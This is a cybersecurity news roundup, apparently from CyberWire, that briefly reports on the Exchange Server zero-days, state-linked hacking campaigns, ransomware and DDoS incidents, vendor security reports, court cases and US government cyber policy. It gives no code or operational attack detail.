At a glance.
- Microsoft warns of Exchange Server vulnerabilities.
- Hacktivists compromise Mexican government data.
- New Lazarus activity: bring-your-own-vulnerable-driver.
- Software supply chain attack reported.
- API protection report describes malicious transactions.
- Analysis of cyber risk in relation to SaaS applications.
- Data stolen from US "Defense Industrial Base organization."
- Mechanisms of fraud.
- Credential theft in the name of Zoom.
- Top CVEs exploited by China.
- COVID-19-themed social engineering.
- Criminals turn to malicious HTML file attachments.
- LAUSD says ransomware operators missed most sensitive PII.
- Major sideloading cryptojacking campaign in progress.
- Killnet hits networks of US state governments.
Microsoft warns of Exchange Server vulnerabilities.
Late last Friday Microsoft disclosed that two zero-days afflicted three versions of its widely used Exchange Server. One, CVE-2022-41040, is a server-side request forgery (SSRF) vulnerability; the second, CVE-2022-41082, is a remote-code execution (RCE) exploit that can be initiated when an attacker has access to PowerShell. Redmond is working on a fix, but until then users may follow mitigations Microsoft's Security Response Center shared in its "Customer Guidance for Reported Zero-day Vulnerabilities in Microsoft Exchange Server." Late Sunday Microsoft added additional advice: "We strongly recommend Exchange Server customers to disable remote PowerShell access for non-admin users in your organization."
Hanoi-based security firm GTSC discovered the zero-days in the course of its monitoring and remediation activity. GTSC sees strong circumstantial evidence that the threat actor or actors behind it are Chinese. "We suspect these exploits come from Chinese attack groups, based on the webshell codepage of 936, a Microsoft character encoding for simplified Chinese.”
The US Cybersecurity and Infrastructure Security Agency (CISA) added both CVE-2022-41082 and CVE-2022-41040 to its Known Exploited Vulnerabilities Catalog. In both cases CISA advises organizations to apply the mitigations Microsoft has provided. US Federal executive civilian agencies have until October 21st to take action. For more information on the Microsoft Exchange zero-days, see CyberWire Pro.
Hacktivists compromise Mexican government data.
Reuters reports that the Mexican government has fallen victim to a cyberattack. The data compromised belonged to the Defense Ministry, and included information about the president’s health condition. Other information contained in the hack included information about criminals, transcripts of communications, and information monitoring the US ambassador to Mexico. It may have been a hacktivist action by the environmental group “Guacamaya,” ("Macaw"). The Record reports that Guacamaya has been active against other Latin American government targets, including the “Secretaría de la Defensa Nacional in México, the Policía Nacional Civil in El Salvador, the Comando General de las Fuerzas Militares in Colombia, the Fuerza Armada in El Salvador and the Ejercito of Peru.” See CyberWire Pro for more on the incident.
New Lazarus activity: bring-your-own-vulnerable-driver.
Researchers at ESET say that North Korea’s Lazarus Group used Amazon-themed spearphishing documents to target “an employee of an aerospace company in the Netherlands, and a political journalist in Belgium.” The goal of the campaign, which occurred last autumn, was data theft. The researchers note that the attackers exploited a vulnerability in Dell DBUtil drivers, which was patched in May 2021. See CyberWire Pro for more on this BYOVD campaign.
Software supply chain attack reported.
CrowdStrike warns that a suspected Chinese threat actor carried out a supply-chain attack by compromising a popular commercial chat product distributed by Vancouver-based customer service firm Comm100. It’s not yet clear how many entities downloaded the malicious installer, but Reuters says “A person familiar with the matter cited a dozen known victims, although the actual figure could be much higher.” CrowdStrike adds that the “trojanized file was identified at organizations in the industrial, healthcare, technology, manufacturing, insurance and telecommunications sectors in North America and Europe.” For more on the compromise, see CyberWire Pro.
API protection report describes malicious transactions.
Cequence Security has published a report on API security, finding that 31% of the 16.7 billion observed malicious transactions in the first half of 2022 targeted unknown or unmanaged APIs, also known as shadow APIs. The vast majority of malicious activity targeting APIs is automated, for example, “sneaker bots attempting to cop the latest Dunks or Air Jordans, to stealthy attackers attempting a slow trickle of card testing fraud on stolen credit cards, to pure brute force credential stuffing campaigns.” For more on the Cequence report, see CyberWire Pro.
Analysis of cyber risk in relation to SaaS applications.
Varonis released a report today detailing Software-as-a-Service (SaaS) applications and the cyber risks associated with them. The researchers analyzed 15 petabytes of data across 717 organizations across a number of industries. 81% of companies analyzed had sensitive SaaS data exposed to the whole internet. The average company has 10% of cloud data exposed to every employee, 157 sensitive records exposed to the open internet through SaaS sharing features, 33 super administrator accounts (with over half of those accounts not utilizing multi-factor authentication), and 4,468 user accounts without multi-factor authentication. For more on SaaS security trends, see CyberWire Pro.
Data stolen from US "Defense Industrial Base organization."
The Cybersecurity and Infrastructure Security Agency (CISA) released a report Tuesday detailing alert AA22-277A. From November 2021 through January 2022, CISA uncovered activity from likely multiple advanced persistent threat (APT) groups on a Defense Industrial Base (DIB) Sector organization’s enterprise network. The organization affected isn't named in the report. The APTs used Impacket, an open-source toolkit, to gain access, and then used custom data exfiltration tool CovalentStealer to steal sensitive data.In this case, as BleepingComupter notes, CISA did not indicate who was behind the APTs. “During incident response activities, CISA uncovered that likely multiple APT groups compromised the organization’s network, and some APT actors had long-term access to the environment,” CISA says in the report.
The agency reports that some APTs may have gained access to the victim’s Microsoft Exchange Server as early as January 2021. Bleeping Computer reports that they used “the HyperBro remote access trojan (RAT), and well over a dozen ChinaChopper webshell samples,” on the organization’s network, as well as exploiting the ProxyLogon collection of Microsoft Exchange Server vulnerabilities CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065. CISA has published, separately, a detailed analysis of both CovalentStealer and HyperBro, the tools that figured prominently in the exploitation. For more information on the incident, see CyberWire Pro.
Mechanisms of fraud.
MIT Technology Review and Visa have published a study of digital financial services, finding that 59% of respondents cited cybersecurity threats as the biggest obstacle to expanding their use of digital payments: “Adopting more advanced security capabilities is a priority for many, including digital tokens and other forms of enhanced authorization (32%) and improving fraud detection through biometric authorization, artificial intelligence, and other advanced technologies (43%). About 42% say their security measures are important to their customers.” For more on the report, see CyberWire Pro.
Credential theft in the name of Zoom.
Armorblox released a blog Thursday detailing a credential phishing attack impersonating Zoom. Researchers report that the attack had a socially engineered payload that bypassed Microsoft Exchange email security, and targeted over 21,000 users before Armorblox stopped the attack. Additional information may be found at CyberWire Pro.
Top CVEs exploited by China.
The US National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI) have issued a joint advisory on the top vulnerabilities being targeted by Chinese state-sponsored threat actors. These include CVE-2021-44228 in Apache Log4j, CVE-2019-11510 in Pulse Connect Secure, CVE-2021-22205 affecting GitLab, CVE-2022-26134 in Atlassian Confluence Server and Data Center, and CVE-2021-26855 in Microsoft Exchange Server. For more details, and industry comment, see CyberWire Pro.
COVID-19-themed social engineering.
Proofpoint has released research detailing how threat actors took advantage of the COVID-19 pandemic for personal gain. The report highlights how threat actors are creatures of opportunity, acting when a threat is of relevance to their audience. In this case, threat actors could cast a wide net, as COVID-19 was relevant to the entire world. It was noted that the pandemic also provided a good background for any type of cybercrime. The pandemic was also a big change in both personal and business-related matters, so social engineering tactics were found to target both. For more information, see CyberWire Pro.
Criminals turn to malicious HTML file attachments.
Researchers at Trustwave SpiderLabs have observed a rise in malicious HTML attachments in phishing emails over the past month. Most of these attachments open a phishing page that impersonates a login portal to steal users’ credentials. The researchers note that some of these files will plug the user’s email address into the login field of the phishing page, to trick the user into thinking they had previously logged in. Attackers are also using HTML smuggling to avoid being detected by email security filters. For more information, see CyberWire Pro.
LAUSD says ransomware operators missed most sensitive PII.
The Los Angeles Unified School District (LAUSD) continues its recovery from the ransomware attack it first reported on September 5th. The Wall Street Journal reports that the LAUSD says that the data taken by the criminals (said to be an unspecified gang operating from Russia) did not include student or staff psychiatric records, as had been rumored. The District says that the compromised data included "little" information on students or staff.
Major sideloading cryptojacking campaign in progress.
Bitdefender researchers say they've detected a significant cryptojacking campaign in the wild. It's a sideloading campaign, and represents an evolution in criminal cryptojacking technique. Bitdefender explains, "This is the case of an active cryptojacking campaign that uses a Dynamic Library Link (DLL) hijacking vulnerability in OneDrive to achieve persistence and run undetected on infected devices."
Killnet hits networks of US state governments.
Killnet, the Russian hacktivist group, nominally independent but acting on behalf of Moscow's security services, has knocked some US state government services offline, CNN reports. Colorado, Kentucky, and Mississippi at least were affected, with some services sporadically rendered unavailable yesterday in distributed denial-of-service (DDoS) attacks. Kentucky's Board of Elections was one of the sites disrupted. The story is still developing, but the effects of the attacks don't seem to have risen above a nuisance level. Killnet has hitherto been best known for conducting DDoS attacks against lightly defended targets in European countries Russia deems too friendly to Ukraine.
Patch news.
The US Cybersecurity and Infrastructure Security Agency (CISA) Tuesday released five Industrial Control System (ICS) Advisories. The notices affected Johnson Controls Metasys ADX Server (improper authentication " could allow an Active Directory user to execute validated actions without providing a valid password"), Hitachi Energy Modular Switchgear Monitoring (cross-site request forgery and HTTP response splitting "could allow an attacker to perform malicious command injection, trick a valid user into downloading malicious software onto their computer;" "successful exploitation may also allow an attacker to pose as a legitimate user"), Horner Automation Cscape (out-of-bounds write, access of uninitialized pointer vulnerabilities "could allow local attackers to execute arbitrary code"), Omron CX-Programmer (an out-of-bounds write vulnerability could be exploited to crash a device or allow arbitrary code execution), and BD Totalys MultiProcessor (hard-coded credentials "could allow an attacker to access, modify, or delete sensitive information, including electronic protected health information (ePHI), protected health information (PHI), and personally identifiable information (PII)").
Crime and punishment.
Former Uber security chief Joe Sullivan has been found guilty of covering up a 2016 data breach, as well as concealing information on a felony from law enforcement, Security Week reports. The month-long trial resulted in a verdict that could put Sullivan in prison for up to 8 years; a maximum of 5 years for the obstruction charge and a maximum of three years for a misprision charge. The New York Times reports that it took more than 19 hours to reach a verdict in the case for the jury of six men and six women. For more on the verdict, including some reaction from industry experts, see CyberWire Pro.
The Record by Recorded Future reports that a 19-year-old Australian man has been arrested after allegedly using stolen Optus records obtained from the recent hack to blackmail victims. According to Australian Federal Police (AFP), the teen sent texts to at least 93 victims demanding $2,000 be sent to a bank account, and threatened fraud in the victims' names if the actions were not completed. “At this stage it appears none of the individuals who received the text message transferred money to the account,” said the AFP.
US District Judge Robert S. Lasnik has sentenced former Amazon systems engineer Paige Thompson, the hacker behind a 2019 data breach of US financial services firm Capital One, to just time served and five years of probation. As CNET recounts, Thompson accessed cloud storage buckets owned by Capital One and exfiltrated the personal data of over 100 million individuals. Although prosecutors were seeking a seven-year sentence, Thompson could have faced up to twenty years in prison for wire fraud. Explaining his ruling, Judge Lasnik said sending Thompson to prison would have been "particularly difficult on her because of her mental health and transgender status.” The Register posits Judge Lasnik was also swayed by Thompson’s statement that she hoped to contribute to society in the future. US Attorney Nick Brown expressed his disappointment in the ruling, stating, “Ms. Thompson’s hacking and theft of information of 100 million people did more than $250 million in damage to companies and individuals. Her cybercrimes created anxiety for millions of people who are justifiably concerned about their private information. This conduct deserves a more significant sanction.” A hearing in December will determine how much Thompson will pay her victims for restitution.
Courts and torts.
The Securities and Exchange Commission (SEC) has charged Kim Kardashian for advertising an EthereumMax crypto asset security without disclosing how much she received to advertise, says the agency. She failed to disclose that she was paid $250,000 to post on Instagram about EMAX tokens. The SEC says, "Kardashian agreed to settle the charges, pay $1.26 million in penalties, disgorgement, and interest, and cooperate with the Commission’s ongoing investigation."
Policies, procurements, and agency equities.
An Executive Order signed Friday by US President Biden moves the US and the EU closer to agreement on data privacy standards. It specifies the safeguards the US undertakes to put in place pursuant to the agreement reached with the European Union in March of this year. The Executive Order specifically addresses European concerns about US signals intelligence and other intelligence activities.
CISA opened the US Federal Fiscal Year with Binding Operational Directive 23-01, "Improving Asset Visibility and Vulnerability Detection on Federal Networks." The Directive specifies desired outcomes for asset visibility and vulnerability detection without prescribing the steps Federal Executive Civilian Agencies need to take to comply. The key compliance deadline is April 3, 2023.
The US FBI and CISA have issued a public service announcement stating that cyber activity is unlikely to disrupt or prevent voting in the US: “As of the date of this report, the FBI and CISA have no reporting to suggest cyber activity has ever prevented a registered voter from casting a ballot, compromised the integrity of any ballots cast, or affected the accuracy of voter registration information. Any attempts tracked by FBI and CISA have remained localized and were blocked or successfully mitigated with minimal or no disruption to election processes. For more on CISA's and the FBI's assessment, see CyberWire Pro.
The US Cybersecurity and Infrastructure Security Agency (CISA) is launching a Protective Domain Name System (DNS) service that will help federal agencies defend against cyberattacks. DNS is used as an attack vector for a wide range of cyber incidents, and CISA’s protective DNS would serve as a barrier between agency networks and the rest of the internet, blocking queries that seek access to known malicious IP addresses. The new DNS resolver replaces an old DNS sinkholing service which was limited to agencies’ on-premise networks, while the new one covers roaming and mobile devices and cloud-based assets. Branko Bokan, lead architect for Protective DNS at CISA, explains, “A lot of federal technologies are no longer behind those on-premise networks, behind firewalls. They’re now all over the Internet, in the cloud, but also we see a large number of what we call roaming and nomadic devices and mobile devices that federal users, both employees and contractors, are using to access federal resources.” The hope is to expand the service beyond federal agencies in the future, Federal News Network adds, and the natural next step would be local governments. “When we originally designed this service, we designed it in mind of the need to scale it to serve the biggest enterprise,” Bokan states. “We would really like to be able to offer this service not just to the federal enterprise, not just the federal civilian executive branch agencies, but to other levels of U.S. governments that might be interested in the same type of protection.”
David Frederick, executive director of U.S. Cyber Command, described US participation in Ukraine's cyber defense during his presentation at GovCon Wire’s Cybersecurity in National Security Summit. He characterized the mission as a series of "hunt-forward" operations. The US teams from the Cyber National Mission Force were dispatched to Ukraine late last year, and worked with their Ukrainian counterparts to assess and secure critical IT and infrastructure networks. Frederick noted that, in the course of operations, US Cyber Command gained valuable insight into Russian methods of cyberwar, much of which insight Cyber Command has shared not only with Government partners like CISA and the FBI, but with the private sector as well.
NBC News reports that the US Supreme Court has agreed to hear a case concerning Section 230 of the Communications Decency Act, which states that internet companies can not be held responsible for transmitting content posted by others. The Washington Post explains that the plaintiffs are the family of Nohemi Gonzalez, a woman murdered in 2015 in a series of attacks carried out by militant Muslim group ISIS, and they allege that YouTube is liable for recommending videos promoting extremist Islamic State views to users. “Videos that users viewed on YouTube were the central manner in which ISIS enlisted support and recruits from areas outside the portions of Syria and Iraq which it controlled,” lawyers for the family argued in their petition. Lawyers at YouTube parent company Google say Section 230 shields the video-streaming platform from any liability. Passed in 1996, the law was created at a time when the internet was young, and in the years since it has come under much scrutiny from critics on both sides of the aisle who say that platforms like YouTube, Instagram, and Facebook forfeit their protections when employing the pervasive algorithms used to recommend videos and advertise products. The New York Times adds that the Supreme Court has also agreed to hear a second lawsuit, Twitter v. Taamneh, which questions whether the company can be liable under the Anti-Terrorism Act for the 2017 death of Jordanian citizen Nawras Alassaf during an ISIS-affiliated attack in Istanbul. Both cases stand to make a big impact in how internet companies are (or are not) held accountable for the content they distribute.